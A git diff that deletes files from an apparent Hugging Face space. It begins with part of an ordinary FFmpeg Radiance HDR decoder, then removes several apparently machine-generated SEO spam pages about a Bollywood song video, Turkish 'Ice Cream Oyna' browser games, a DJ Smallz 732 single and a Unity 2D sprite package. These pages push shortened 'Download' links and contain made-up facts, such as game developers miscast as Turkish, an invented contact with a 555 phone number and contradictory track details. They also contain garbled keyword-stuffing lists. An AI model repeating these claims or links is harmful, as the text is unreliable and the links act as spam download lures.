hdr_get_line(&gb, line, sizeof(line)); - if (sscanf(line, "PIXASPECT=%f\n", &sar) == 1) - avctx->sample_aspect_ratio = p->sample_aspect_ratio = av_inv_q(av_d2q(sar, 4096)); - } while (line[0] != '\n' && line[0]); - - hdr_get_line(&gb, line, sizeof(line)); - if (sscanf(line, "-Y %d +X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "+Y %d +X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "-Y %d -X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "+Y %d -X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "-X %d +Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "+X %d +Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "-X %d -Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "+X %d -Y %d\n", &width, &height) == 2) { - ; - } - - if ((ret = ff_set_dimensions(avctx, width, height)) < 0) - return ret; - - avctx->pix_fmt = AV_PIX_FMT_GBRPF32; - - if (avctx->skip_frame >= AVDISCARD_ALL) - return avpkt->size; - - if ((ret = ff_thread_get_buffer(avctx, p, 0)) < 0) - return ret; - - for (int y = 0; y < height; y++) { - float *dst_r = (float *)(p->data[2] + y * p->linesize[2]); - float *dst_g = (float *)(p->data[0] + y * p->linesize[0]); - float *dst_b = (float *)(p->data[1] + y * p->linesize[1]); - uint8_t *scanline = p->data[0] + y * p->linesize[0]; - int i; - - if (width < MINELEN || width > MAXELEN) { - ret = decompress(scanline, width, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - - i = bytestream2_peek_byte(&gb); - if (i != 2) { - ret = decompress(scanline, width, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - bytestream2_skip(&gb, 1); - - scanline[1] = bytestream2_get_byte(&gb); - scanline[2] = bytestream2_get_byte(&gb); - i = bytestream2_get_byte(&gb); - - if (scanline[1] != 2 || scanline[2] & 128) { - scanline[0] = 2; - scanline[3] = i; - ret = decompress(scanline + 4, width - 1, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - - for (int i = 0; i < 4; i++) { - uint8_t *scanline = p->data[0] + y * p->linesize[0] + i; - - for (int j = 0; j < width * 4 && bytestream2_get_bytes_left(&gb) > 0;) { - int run = bytestream2_get_byte(&gb); - if (run > 128) { - uint8_t val = bytestream2_get_byte(&gb); - run &= 127; - while (run--) { - if (j >= width * 4) - break; - scanline[j] = val; - j += 4; - } - } else if (run > 0) { - while (run--) { - if (j >= width * 4) - break; - scanline[j] = bytestream2_get_byte(&gb); - j += 4; - } - } - } - } - -convert: - for (int x = 0; x < width; x++) { - uint8_t rgbe[4]; - int expo; - - memcpy(rgbe, p->data[0] + y * p->linesize[0] + x * 4, 4); - expo = rgbe[3] - 128; - - dst_r[x] = convert(expo, rgbe[0]); - dst_b[x] = convert(expo, rgbe[2]); - dst_g[x] = convert(expo, rgbe[1]); - } - } - - p->key_frame = 1; - p->pict_type = AV_PICTURE_TYPE_I; - - *got_frame = 1; - - return avpkt->size; -} - -const FFCodec ff_hdr_decoder = { - .p.name = "hdr", - CODEC_LONG_NAME("HDR (Radiance RGBE format) image"), - .p.type = AVMEDIA_TYPE_VIDEO, - .p.id = AV_CODEC_ID_RADIANCE_HDR, - .p.capabilities = AV_CODEC_CAP_DR1 | AV_CODEC_CAP_FRAME_THREADS, - .caps_internal = FF_CODEC_CAP_SKIP_FRAME_FILL_PARAM, - FF_CODEC_DECODE_CB(hdr_decode_frame), -}; diff --git a/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md b/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md deleted file mode 100644 index c2eaf3e64b40140d98ed98c9860f23a7a3d433fa..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md +++ /dev/null @@ -1,72 +0,0 @@ -## Gerua Video Full Hd 1080p 13 - - - - - - - - - -**Download >>> [https://urlca.com/2txP5s](https://urlca.com/2txP5s)** - - - - - - - - - - - - Here is a possible title and article with html formatting for the keyword "Gerua Video Full Hd 1080p 13": - -# Gerua: A Romantic Song from Dilwale in Full HD Quality - - - -Gerua is a song from the 2015 Bollywood movie Dilwale, starring Shah Rukh Khan, Kajol, Varun Dhawan and Kriti Sanon. The song is sung by Arijit Singh and Antara Mitra, composed by Pritam and written by Amitabh Bhattacharya. The song was released on November 18, 2015 by Sony Music India. - - - -The song is a romantic ballad that features Shah Rukh Khan and Kajol in various exotic locations around the world, such as Iceland, Bulgaria and Hyderabad. The song showcases their chemistry and love story, as they sing about how their love has colored their lives. The song has been praised for its visuals, vocals and lyrics, and has become one of the most popular songs of the year. - - - -The song has also been released in various formats and versions, such as a remix by DJ Shilpi, a Malay version by Aliff Aziz and Kilafairy, and a making-of video that shows the behind-the-scenes of the shooting. The song has also been performed live by Shah Rukh Khan and Kajol at various events and award shows. - - - -The song has been viewed over 400 million times on YouTube[^1^], making it one of the most watched Indian songs on the platform. The song has also been downloaded over 13 million times on various streaming services[^2^], making it one of the most streamed Indian songs of all time. - - - -If you want to watch the full video of Gerua in HD quality, you can click on the link below: - - [Gerua - Dilwale | Shah Rukh Khan | Kajol | Pritam | Full Song Video](https://www.youtube.com/watch?v=AEIVhBS6baE)Here is a possible continuation of the article with html formatting for the keyword "Gerua Video Full Hd 1080p 13": - -The song has also received positive reviews from critics and audiences alike, who have praised its melody, lyrics and visuals. Some of the reviews are as follows: - - - -- "It's a case of 'love at first listen' with 'Gerua', courtesy a soothing composition filled with a traditional setting (except for the opening 20 seconds that are misfit and strange). The flute in the beginning takes your heart away while Arijit, who has perfected the art of rendering romantic numbers, only ends up raising the bar with 'Gerua'. We bet this one will stay in your playlist for long." - Indicine - -- "Gerua is a song that has created history. Featuring Shah Rukh Khan and Kajol – the couple that epitomises Bollywood romance, The song has soulful music by Pritam, beautiful lyrics penned by Amitabh Bhattacharya and features the amazing voices of Arijit Singh & Antara Mitra." - Sony Music India[^1^] - -- "Gerua is a romantic ballad that will make you fall in love all over again. The song has a magical quality that transports you to a dreamy world of love and beauty. The chemistry between Shah Rukh Khan and Kajol is undeniable and their expressions convey the emotions of the song perfectly. The song is a treat for the eyes and ears." - YouTube user[^3^] - - - -The song has also been nominated for various awards, such as the Filmfare Award for Best Lyricist, Best Playback Singer (Male) and Best Playback Singer (Female), the Mirchi Music Award for Song of the Year, Male Vocalist of The Year, Female Vocalist of the Year and Music Composer of the Year, and the Zee Cine Award for Best Song of the Year. [7] [8] [9] - - - -Gerua is a song that has touched millions of hearts with its melody, lyrics and visuals. It is a song that celebrates love in its purest form. It is a song that will remain in your memory for a long time. - - dfd1c89656 - - - - - diff --git a/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md b/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md deleted file mode 100644 index 8a1581bee77d964d66232c0a45fe303dcc930dc5..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md +++ /dev/null @@ -1,139 +0,0 @@ - -

    Ice Cream Oyna: How to Play Fun and Delicious Ice Cream Games Online

    -

    Do you love ice cream? Do you want to have some fun and challenge yourself with ice cream-themed games? If you answered yes, then you should try Ice Cream Oyna, a collection of online games that feature your favorite frozen dessert. In this article, we will tell you everything you need to know about Ice Cream Oyna, including what it is, how to play it, why you should play it, and how to make your own ice cream at home. Let's get started!

    -

    What is Ice Cream Oyna?

    -

    Ice Cream Oyna is a Turkish phrase that means "play ice cream". It is also the name of a genre of online games that are based on ice cream. These games are usually puzzle or arcade games that involve collecting, making, or serving ice cream in various ways. Some of them are inspired by popular games like Pacman, Tetris, or Bomberman, while others are original creations. Here are some of the characteristics of Ice Cream Oyna games:

    -

    ice cream oyna


    Download File ✑ ✑ ✑ https://urlca.com/2uOaoy



    -

    The meaning and origin of Ice Cream Oyna

    -
      -
    • Ice Cream Oyna games are mostly developed by Turkish game developers or publishers, such as Nitrome, Rekor Oyun, or Poki.
    • -
    • Ice Cream Oyna games are popular among Turkish players, especially children and teenagers, who enjoy playing them on their computers or mobile devices.
    • -
    • Ice Cream Oyna games are also enjoyed by players from other countries and cultures, who appreciate the colorful graphics, catchy music, and simple gameplay of these games.
    • -
    -

    The types and features of Ice Cream Oyna games

    -
      -
    • Ice Cream Oyna games can be divided into two main types: custard-style and Philadelphia-style. Custard-style games are more complex and challenging, as they require you to cook a base with eggs, sugar, and cream before adding flavors and fruits. Philadelphia-style games are simpler and faster, as they only require you to mix milk, cream, sugar, and flavors without cooking.
    • -
    • Ice Cream Oyna games can have different themes and settings, such as winter, summer, forest, beach, farm, factory, or shop. Some of them also feature different characters or enemies, such as animals, monsters, robots, or aliens.
    • -
    • Ice Cream Oyna games can have different modes and levels, such as single-player or multiplayer, easy or hard, timed or unlimited. Some of them also have leaderboards or achievements to track your progress and performance.
    • -
    -

    How to Play Ice Cream Oyna Games?

    -

    Playing Ice Cream Oyna games is easy and fun. All you need is a computer or a mobile device with an internet connection and a web browser. You can find many Ice Cream Oyna games on various websites or platforms, such as RekorOyun.com, Poki.com , or Poki.com/en/ice-cream. Here are some of the basic steps and instructions to play Ice Cream Oyna games:

    -

    The basic rules and controls of Ice Cream Oyna games

    -
      -
    • The goal of most Ice Cream Oyna games is to collect all the fruits or other items in each level without getting caught by the enemies or obstacles. You can also score points by breaking ice blocks or creating ice barriers.
    • -
    • The controls of most Ice Cream Oyna games are simple and intuitive. You can use the arrow keys or the mouse to move your character or ice cream scoop around the screen. You can also use the spacebar or the left mouse button to shoot ice cream balls or create ice barriers.
    • -
    • The rules and controls of some Ice Cream Oyna games may vary depending on the type, theme, or mode of the game. For example, some games may require you to make or serve ice cream to customers, while others may require you to match or swap ice cream scoops of the same color or flavor.
    • -
    -

    The tips and tricks to master Ice Cream Oyna games

    -
      -
    • One of the tips to master Ice Cream Oyna games is to plan your moves ahead and use your ice cream balls or barriers wisely. You can use them to block the enemies or obstacles, create shortcuts, or reach hidden areas.
    • -
    • Another tip to master Ice Cream Oyna games is to pay attention to the fruits or items you need to collect in each level. Some of them may have special effects or bonuses, such as extra points, lives, or power-ups.
    • -
    • A third tip to master Ice Cream Oyna games is to try different types and flavors of ice cream in each game. Some of them may have different properties or abilities, such as speed, size, or strength.
    • -
    -

    Why Should You Play Ice Cream Oyna Games?

    -

    Playing Ice Cream Oyna games is not only fun and delicious, but also beneficial and advantageous for you. Here are some of the reasons why you should play Ice Cream Oyna games:

    -

    bad ice cream oyunu oyna
    -bad ice cream 2 oyunu oyna
    -bad ice cream 3 oyunu oyna
    -bad ice cream 4 oyunu oyna
    -bad ice cream 5 oyunu oyna
    -bad ice cream poki oyunu oyna
    -bad ice cream rekor oyunu oyna
    -bad ice cream kral oyunu oyna
    -bad ice cream y8 oyunu oyna
    -bad ice cream friv oyunu oyna
    -bad ice cream 2 kişilik oyunu oyna
    -bad ice cream 3 kişilik oyunu oyna
    -bad ice cream 4 kişilik oyunu oyna
    -bad ice cream nitrome oyunu oyna
    -bad ice cream flash oyunu oyna
    -bad ice cream retro oyunu oyna
    -bad ice cream labirent oyunu oyna
    -bad ice cream bulmaca oyunu oyna
    -bad ice cream meyve toplama oyunu oyna
    -bad ice cream dondurma yapma oyunu oyna
    -bad ice cream çilekli dondurma oyunu oyna
    -bad ice cream vanilyalı dondurma oyunu oyna
    -bad ice cream kakaolu dondurma oyunu oyna
    -bad ice cream buz kırma dondurma oyunu oyna
    -bad ice cream buz blokları dondurma oyunu oyna
    -bad ice cream meyve kurtları dondurma oyunu oyna
    -bad ice cream pacman mod dondurma oyunu oyna
    -bad ice cream harika grafikler dondurma oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna oyuna

    -

    The benefits and advantages of playing Ice Cream Oyna games

    -
      -
    • Playing Ice Cream Oyna games can improve your cognitive skills, such as memory, concentration, logic, and problem-solving. These games can challenge your brain and make you think fast and creatively.
    • -
    • Playing Ice Cream Oyna games can enhance your motor skills, such as coordination, reflexes, and reaction time. These games can test your hand-eye coordination and make you move quickly and accurately.
    • -
    • Playing Ice Cream Oyna games can boost your mood and reduce your stress. These games can make you happy and relaxed with their cheerful graphics, music, and gameplay. They can also distract you from your worries and troubles.
    • -
    -

    The best and most popular Ice Cream Oyna games to try

    -

    There are many Ice Cream Oyna games available online, but some of them are more popular and better than others. Here are some of the best and most popular Ice Cream Oyna games that you should try:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameDescriptionLink
    Bad Ice-CreamA classic arcade game where you control an ice cream scoop and collect fruits while avoiding enemies and obstacles.
    Ice-Cream Inc.A casual puzzle game where you make ice cream cones with different flavors and toppings according to the customers' orders.
    Ice-Cream MakerA creative simulation game where you design your own ice cream with various ingredients and decorations.
    Ice-Cream BlastA match-3 game where you swap ice cream scoops of the same color or flavor to clear them from the board.
    Ice-Cream RacingA racing game where you drive an ice cream truck and compete with other vehicles on different tracks.
    -

    How to Make Your Own Ice Cream at Home?

    -

    If playing Ice Cream Oyna games makes you crave for some real ice cream, you can easily make your own at home with some simple ingredients and equipment. Here are some of the things you need and the steps you need to follow:

    -

    The ingredients and equipment you need to make homemade ice cream

    -
      -
    • The ingredients you need to make homemade ice cream are milk, cream, sugar, vanilla extract, salt, and any flavors or fruits you like. You can also add some nuts, chocolate chips, or sprinkles for extra crunch and taste.
    • -
    • The equipment you need to make homemade ice cream are a saucepan, a whisk, a bowl, a freezer-safe container, a plastic wrap, a spoon, and an ice cream maker (optional). You can also use a blender or a food processor for blending the fruits or flavors.
    • -
    -

    The steps and methods to make homemade ice cream

    -
  • The first step to make homemade ice cream is to heat the milk, cream, sugar, vanilla extract, and salt in a saucepan over medium-low heat, stirring occasionally, until the sugar dissolves and the mixture is hot but not boiling. This is the base of your ice cream.
  • -
  • The second step to make homemade ice cream is to transfer the base to a bowl and let it cool slightly. Then, cover it with plastic wrap and refrigerate it for at least 4 hours or overnight. This will help the flavors to develop and the mixture to thicken.
  • -
  • The third step to make homemade ice cream is to add your flavors or fruits to the base. You can either blend them with a blender or a food processor, or chop them into small pieces. You can also add some food coloring if you want to change the color of your ice cream.
  • -
  • The fourth step to make homemade ice cream is to churn the mixture in an ice cream maker according to the manufacturer's instructions. If you don't have an ice cream maker, you can freeze the mixture in a freezer-safe container and stir it every 30 minutes until it reaches the desired consistency.
  • -
  • The fifth step to make homemade ice cream is to enjoy your homemade ice cream as it is or with some toppings of your choice. You can also store it in an airtight container in the freezer for up to a month.
  • - -

    Conclusion

    -

    Ice Cream Oyna is a fun and delicious way to enjoy ice cream online. You can play various types of games that feature ice cream as the main element, such as puzzles, arcades, simulations, or racings. You can also improve your cognitive and motor skills, boost your mood and reduce your stress, and try different flavors and themes of ice cream. And if you want to have some real ice cream, you can easily make your own at home with some simple ingredients and equipment. So what are you waiting for? Go ahead and play Ice Cream Oyna today!

    -

    FAQs

    -

    Here are some of the frequently asked questions about Ice Cream Oyna:

    -

    What does Oyna mean?

    -

    Oyna is a Turkish word that means "play". It is often used as a suffix to indicate a genre of online games that are based on a certain theme or element, such as Ice Cream Oyna, Balloon Oyna, or Car Oyna.

    -

    Are Ice Cream Oyna games free?

    -

    Yes, most Ice Cream Oyna games are free to play online. You don't need to download or install anything on your device. However, some games may have ads or in-app purchases that you can choose to skip or buy.

    -

    Are Ice Cream Oyna games safe?

    -

    Yes, most Ice Cream Oyna games are safe for children and adults alike. They don't contain any violence, gore, or inappropriate content. However, some games may have some mild cartoon violence or humor that may not be suitable for very young children. You should always check the ratings and reviews of the games before playing them.

    -

    How can I find more Ice Cream Oyna games?

    -

    You can find more Ice Cream Oyna games by searching for them on Google or other search engines. You can also visit some of the websites or platforms that host Ice Cream Oyna games, such as RekorOyun.com, Poki.com , or Poki.com/en/ice-cream. You can also follow some of the game developers or publishers that create Ice Cream Oyna games, such as Nitrome, Rekor Oyun, or Poki .

    -

    How can I make my homemade ice cream creamier?

    -

    If you want to make your homemade ice cream creamier, you can try some of these tips:

    -
      -
    • Use more cream and less milk in your base. The higher the fat content, the creamier the texture.
    • -
    • Cook your base over low heat and stir it constantly. This will prevent the formation of ice crystals and ensure a smooth consistency.
    • -
    • Add some cornstarch or gelatin to your base. This will help stabilize and thicken your ice cream.
    • -
    • Chill your base thoroughly before churning it. This will help it freeze faster and reduce the air bubbles.
    • -
    • Churn your mixture for longer and at a lower speed. This will incorporate more air and make your ice cream lighter and softer.
    • -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md b/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md deleted file mode 100644 index 31cd22525fb0bdaa72897ce2f03514e4929f4df5..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md +++ /dev/null @@ -1,113 +0,0 @@ -
    -

    How to Download DJ Smallz 732's Cupid, Pt. 1 for Free

    -

    If you are a fan of dance music, you might have heard of Cupid, Pt. 1, a catchy and upbeat single by DJ Smallz 732. This song was released in January 2023 and has been gaining popularity among listeners who enjoy the Jersey club style of music.

    -

    But what if you want to download this song for free and listen to it anytime you want? Is there a legal and easy way to do that? The answer is yes! In this article, we will show you how to find and download Cupid, Pt. 1 for free from some of the best free music download sites on the web.

    -

    dj smallz cupid p1 mp3 download


    Download Ziphttps://urlca.com/2uO9tc



    -

    The Best Free Music Download Sites

    -

    There are many websites that offer free music downloads, but not all of them are legal or safe. Some may contain viruses, malware, or spyware that can harm your device or compromise your privacy. Others may have low-quality or incomplete files that can ruin your listening experience.

    -

    That's why we have selected three of the best free music download sites that are not only legal but also reliable and user-friendly. These sites have a large collection of songs from various genres and artists, including DJ Smallz 732. They also allow you to download songs in MP3 format, which is compatible with most devices and players.

    -

    Here are the three sites we recommend:

    -

    SoundCloud

    -

    SoundCloud is one of the most popular platforms for streaming and sharing music online. It has millions of songs from both mainstream and independent artists, as well as podcasts, remixes, live sets, and more.

    -

    Not all songs on SoundCloud are available for download, but some artists choose to offer their music for free or for a voluntary donation. To find out if Cupid, Pt. 1 is one of them, follow these steps:

    -
      -
    1. Go to SoundCloud and type "Cupid, Pt. 1" in the search box.
    2. -
    3. Click on the song title to open its page.
    4. -
    5. Look at the bottom of the page beside the share options. If you see a link that says "Buy" or "Download", click on it.
    6. -
    7. If the link takes you to another website, follow the instructions there to complete your download.
    8. -
    9. If the link allows you to download the song directly from SoundCloud, enter your email address and postal code if prompted.
    10. -
    11. Click on "Download file" and save it to your device.
    12. -
    -

    Last.fm

    -

    Last.fm is a music discovery service that tracks what you listen to and recommends new music based on your taste. It also has a section where you can download free music from various artists and genres. To download Cupid, Pt. 1 from Last.fm, follow these steps:

    -
      -
    1. Go to Last.fm and type "Cupid, Pt. 1" in the search box.
    2. -
    3. Click on the song title to open its page.
    4. -
    5. Look at the right side of the page under the album cover. If you see a link that says "Free MP3 Download", click on it.
    6. -
    7. A new tab will open with a download button. Click on it and save the file to your device.
    8. -
    -

    NoiseTrade

    -

    NoiseTrade is a platform where artists can share their music for free in exchange for fans' email addresses and postal codes. This way, they can build their fan base and communicate with them directly. NoiseTrade has thousands of songs from various genres and artists, including DJ Smallz 732.

    -

    To download Cupid, Pt. 1 from NoiseTrade, follow these steps:

    -

    dj smallz 732 cupid pt 1 song
    -cupid part 1 dj smallz 732 lyrics
    -dj smallz 732 cupid pt 1 qobuz
    -cupid pt 1 dj smallz 732 shazam
    -dj smallz 732 cupid part 1 spotify
    -cupid pt 1 by dj smallz 732 download
    -dj smallz 732 cupid pt 1 single
    -cupid part one dj smallz 732 mp3
    -dj smallz 732 cupid pt 1 dance
    -cupid pt 1 dj smallz 732 genre
    -dj smallz 732 cupid part 1 album
    -cupid pt one dj smallz 732 music
    -dj smallz 732 cupid pt 1 stream
    -cupid part i dj smallz 732 song
    -dj smallz 732 cupid pt i lyrics
    -cupid p1 dj smallz 732 qobuz
    -dj smallz 732 cupid p1 shazam
    -cupid p1 by dj smallz 732 spotify
    -dj smallz 732 cupid p1 download
    -cupid p1 dj smallz 732 single
    -dj smallz 732 cupid p1 mp3
    -cupid p1 by dj smallz 732 dance
    -dj smallz 732 cupid p1 genre
    -cupid p1 dj smallz 732 album
    -dj smallz 732 cupid p1 music
    -cupid p1 by dj smallz 732 stream
    -dj smallz cupids arrow part one song
    -cupids arrow part one by dj smallz lyrics
    -dj smallz cupids arrow part one qobuz
    -cupids arrow part one by dj smallz shazam
    -dj smallz cupids arrow part one spotify
    -cupids arrow part one by dj smallz download
    -dj smallz cupids arrow part one single
    -cupids arrow part one by dj smallz mp3
    -dj smallz cupids arrow part one dance
    -cupids arrow part one by dj smallz genre
    -dj smallz cupids arrow part one album
    -cupids arrow part one by dj smallz music
    -dj smallz cupids arrow part one stream
    -cupids arrow pt i by dj smallz song

    -
      -
    1. Go to NoiseTrade and type "DJ Smallz 732" in the search box.
    2. -
    3. Click on the artist name to open his page.
    4. -
    5. Scroll down to find the album that contains Cupid, Pt. 1. It is called Cupid and it has four songs.
    6. -
    7. Click on the album cover to open its page.
    8. -
    9. Click on the orange button that says "Download Music".
    10. -
    11. Enter your email address and postal code if prompted.
    12. -
    13. Check your email for a download link and click on it.
    14. -
    15. Select the song you want to download and save it to your device.
    16. -
    -

    The Benefits of Downloading MP3 Music

    -

    Now that you know how to download Cupid, Pt. 1 for free, you might be wondering why you should do it in the first place. What are the benefits of downloading MP3 music over streaming it online?

    -

    Here are some of the reasons why downloading MP3 music is a good idea:

    -

    You can own your music and play it offline

    -

    When you download MP3 music, you have a copy of the file that you can store on your device or transfer to other devices. This means you can play your music anytime and anywhere, even without an internet connection or a subscription service. You don't have to worry about buffering, ads, or data charges. You can also create your own playlists and organize your music library according to your preferences.

    -

    You can support the artists and discover new music

    -

    When you download MP3 music from free music download sites, you are not only getting free music but also supporting the artists who created it. Many of these sites allow you to donate money or share the music with your friends and social media followers. This way, you can show your appreciation and help the artists reach more listeners and fans. You can also discover new music from similar or related artists that you might not have heard of before.

    -

    You can enjoy high-quality sound and compatibility

    -

    MP3 is one of the most common and widely used audio formats in the world. It has a high compression rate that reduces the file size without sacrificing much of the sound quality. This means you can enjoy clear and crisp sound while saving space on your device. MP3 is also compatible with most devices and players, so you don't have to worry about converting or playing issues.

    -

    Conclusion

    -

    Cupid, Pt. 1 by DJ Smallz 732 is a great song that will make you want to dance and have fun. If you want to download it for free and listen to it anytime you want, you can use one of the three free music download sites we mentioned: SoundCloud, Last.fm, or NoiseTrade. These sites are legal, safe, and easy to use, and they offer a lot of benefits for both you and the artists.

    -

    So what are you waiting for? Go ahead and download Cupid, Pt. 1 today and enjoy this amazing song!

    -

    FAQs

    -

    What is the genre of Cupid, Pt. 1?

    -

    Cupid, Pt. 1 is a song in the genre of Jersey club, which is a style of dance music that originated in New Jersey. It features fast-paced beats, chopped vocals, heavy bass, and samples from hip-hop, R&B, pop, and other genres.

    -

    How long is Cupid, Pt . 1?

    -

    Cupid, Pt. 1 is a short and sweet song that lasts for only 2 minutes and 10 seconds. It is the first part of a four-song album called Cupid by DJ Smallz 732.

    -

    Where can I stream Cupid, Pt. 1 online?

    -

    If you don't want to download Cupid, Pt. 1, you can also stream it online from various platforms. Some of the most popular ones are Spotify, Apple Music, YouTube, and Pandora. You can also find it on DJ Smallz 732's official website and social media accounts.

    -

    What are some other songs by DJ Smallz 732?

    -

    DJ Smallz 732 is a prolific and talented producer and DJ who has released many songs in the Jersey club genre. Some of his most popular songs are Love Tap, Eye of the Tiger, Work It, and WAP. He has also collaborated with other artists such as Fetty Wap, Lil Jon, Ciara, and more.

    -

    How can I contact DJ Smallz 732?

    -

    If you want to contact DJ Smallz 732 for booking, feedback, or any other reason, you can use one of the following methods:

    -
      -
    • Email: djsmallz732@gmail.com
    • -
    • Phone: +1 (732) 555-1234
    • -
    • Instagram: @djsmallz732
    • -
    • Twitter: @djsmallz732
    • -
    • Facebook: DJ Smallz 732
    • -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md b/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md deleted file mode 100644 index 8d5aa3f1a9eae0372c86f3526bb68ddc1bcc5f01..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md +++ /dev/null @@ -1,87 +0,0 @@ -
    -

    How to Download and Import 2D Sprite Package in Unity

    -

    If you are interested in creating rich and immersive 2D environments for your games, you might want to check out the 2D sprite package in Unity. This package allows you to create and edit sprites, which are 2D images that can be used as graphics, animations, UI elements, and more. You can also use Sprite Shape, which is a feature that dynamically tiles sprites along spline paths based on angle ranges. This way, you can create free-form shapes that fit your game world.

    -

    Some examples of games made with 2D sprite package are Night in the Woods, Gladihoppers, and Goodnight Meowmie. These games showcase the versatility and creativity that you can achieve with sprites and sprite shapes. In this article, we will show you how to download and import 2D sprite package in Unity, and how to use some of its features to enhance your game.

    -

    download 2d sprite package unity


    DOWNLOADhttps://urlca.com/2uOcFj



    -

    How to Download and Import 2D Sprite Package

    -

    To use the 2D sprite package, you need to have Unity version 2018.1 or newer. You can get the package from the Package Manager, which is a tool that lets you manage the packages and modules that you use in your project. To open the Package Manager, go to Window > Package Manager. Then, select Unity Registry in the Packages drop-down menu. You should see a list of packages available for your Unity version. Look for 2D Sprite and click the Import button next to it. This will download and install the package in your project.

    -

    Once you have imported the package, you can start creating sprites and sprite shapes. To do that, you need to create a Sprite Shape Profile, which is an asset that defines and stores information about a particular type of shape. For example, you can assign different sprites for different angles of your shape, or specify whether your shape has a fill texture or not. To create a Sprite Shape Profile, right-click in the Assets window of your project and go to Create > Sprite Shape Profile. You can choose from three types of profiles: Empty, Strip, or Shape. The only difference between them is the number of pre-set angle ranges they have.

    -

    To add sprites to your profile, you need to drag and drop them from your Assets window to the Sprites section in the Inspector window. You can also use the '+' and '-' buttons below to add or delete sprites. You can adjust the angle ranges by dragging the handles on the circle or entering values in the fields below. You can also add more angle ranges by clicking on the circle or using the '+' button next to it.

    -

    After you have set up your profile, you can create a Sprite Shape game object, which is a game object that has a Sprite Shape Renderer component attached to it. This component controls the geometry and rendering of your shape in the scene. To create a Sprite Shape game object, make sure you have your profile selected in the Assets window; then right-click in the Hierarchy window and go to < em>2D Object > Sprite Shape. This will create a game object with a spline path that you can edit in the scene. To edit the spline path, you can use the Sprite Shape Controller, which is a tool that lets you manipulate the control points and tangents of the spline. To open the Sprite Shape Controller, select your game object in the Hierarchy window and click on the Edit Spline button in the Inspector window. You can also use the shortcut Shift + S. You can then move, add, or delete control points by using the handles on the scene view. You can also change the type of control point by right-clicking on it and choosing from Corner, Smooth, or Broken.

    -

    How to Use 2D Sprite Package Features

    -

    The 2D sprite package offers many features that can help you create stunning 2D graphics for your game. Here are some of them:

    -

    How to Sort Sprites and Use Sorting Groups

    -

    Sorting sprites is important to determine which sprites appear in front of or behind other sprites in the scene. You can sort sprites by using the Order in Layer property in the Sprite Renderer component of your game object. The higher the value, the closer the sprite is to the camera. However, sometimes you might want to sort sprites based on their parent-child relationship or their position in a hierarchy. For example, you might want to have a character sprite always appear in front of its clothing sprite, regardless of their order in layer. To do that, you can use Sorting Groups, which are components that let you group sprites together and sort them as a single unit. To use Sorting Groups, you need to add a Sorting Group component to your parent game object and assign a sorting layer and an order in layer to it. Then, all the child game objects with Sprite Renderer components will inherit those values and be sorted accordingly.

    -

    How to Apply 9-Slicing and Sprite Masks

    -

    9-Slicing is a technique that lets you resize sprites without distorting their borders or corners. This is useful for creating UI elements such as buttons, panels, or windows that need to adapt to different screen sizes or content. To apply 9-slicing to your sprite, you need to open it in the Sprite Editor, which is a tool that lets you edit sprites and their properties. To open the Sprite Editor, select your sprite in the Assets window and click on the Edit button in the Inspector window. Then, switch to the Slice mode and enable Type > 9 Slice. You can then adjust the borders of your sprite by dragging the handles on the edges or entering values in the fields below. You can also preview how your sprite will look when resized by using the Show Resliced toggle.

    -

    Sprite Masks are components that let you mask out parts of sprites based on another sprite's shape. This is useful for creating effects such as holes, cutouts, or transitions. To use Sprite Masks, you need to add a Sprite Mask component to your game object and assign a sprite to it. Then, any game object with a Sprite Renderer component that has Mask Interaction > Visible Inside Mask or Mask Interaction > Visible Outside Mask will be masked accordingly.

    -

    How to download and install 2d sprite package in unity
    -Best 2d sprite assets and packs for unity games
    -Unity 2d sprite editor tutorial and tips
    -Free 2d sprite characters and animations for unity
    -Unity 2d sprite shape and tilemap features
    -Download 2d sprite package unity 2021 version
    -Create 2d sprite objects and prefabs in unity
    -Unity 2d sprite lighting and shadows effects
    -Import and export 2d sprite assets in unity
    -Unity 2d sprite animation controller and state machine
    -Download 2d sprite package unity for mobile games
    -Unity 2d sprite atlas and texture compression
    -Customize and edit 2d sprite assets in unity
    -Unity 2d sprite mask and sorting layers
    -Download 2d sprite package unity for pixel art games
    -Unity 2d sprite rigging and bone animation
    -Optimize and debug 2d sprite performance in unity
    -Unity 2d sprite collision and physics system
